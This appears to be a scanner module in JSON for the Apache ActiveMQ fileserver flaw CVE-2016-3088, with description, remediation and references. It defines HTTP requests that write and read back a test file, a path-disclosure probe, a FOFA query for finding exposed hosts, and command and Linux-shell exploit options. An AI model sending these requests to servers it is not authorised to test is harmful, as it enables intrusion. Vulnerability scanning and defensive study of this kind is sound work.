ActiveMQ-Arbitrary-File-Write-Vulnerability-(CVE-2016-3088).json
{
"Name": "ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)",
"Description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.",
"Product": "Apache-ActiveMQ",
"Homepage": "http://activemq.apache.org/",
"DisclosureDate": "2016-07-01",
"Author": "LubyRuffy",
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/ActiveMQ/CVE-2016-3088/CVE-2016-3088.gif",
"FofaQuery": "app=\"Apache-ActiveMQ\" && protocol!=activemq && protocol!=stomp",
"Level": "3",
"Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.",
"Recommendation": "Fileserver completely removed starting with 5.14.0 release. Users are advised to use other FTP and HTTP based file servers for transferring blob messages. Fileserver web application SHOULD NOT be used in older version of the broker and it should be disabled (it has been disabled by default since 5.12.0). This can be done by removing (commenting out) the following lines from conf\\jetty.xml file\n<pre>\n<bean class=\"org.eclipse.jetty.webapp.WebAppContext\">\n \n<property name=\"contextPath\" value=\"/fileserver\" />\n <property name=\"resourceBase\" value=\"${activemq.home}/webapps/fileserver\" />\n <property name=\"logUrlOnStart\" value=\"true\" />\n <property name=\"parentLoaderPriority\" value=\"true\" />\n</bean>\n</pre>",
"References": [
"https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet",
"http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt",
"http://rhn.redhat.com/errata/RHSA-2016-2036.html",
"http://www.securitytracker.com/id/1035951",
"http://www.zerodayinitiative.com/advisories/ZDI-16-356",
"http://www.zerodayinitiative.com/advisories/ZDI-16-357",
"https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E",
"https://lists.apache.org/thread.html/f956ea38e4da2e2c1e7131e6f91e41754852f5a4861d1a14ca5ca78a@%3Cusers.activemq.apache.org%3E",
"https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E",
"https://www.exploit-db.com/exploits/42283/",
"https://nvd.nist.gov/vuln/detail/CVE-2016-3088",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088",
"https://www.exploit-db.com/exploits/40857"
],
"HasExp": true,
"ExpParams": [
{
"name": "AttackType",
"type": "select",
"value": "cmd,goby_shell_linux"
},
{
"Name": "cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "PUT",
"uri": "/fileserver/g.txt",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": "^^^"
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "204",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
}
},
{
"Request": {
"method": "GET",
"uri": "/fileserver/g.txt",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "^^^",
"bz": ""
}
]
}
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/fileserver/%80/%80.txt",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": "^^^"
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "204",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
}
}
],
"Tags": [
"rce"
],
"CVEIDs": [
"CVE-2016-3088"
],
"CVSSScore": "9.8",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}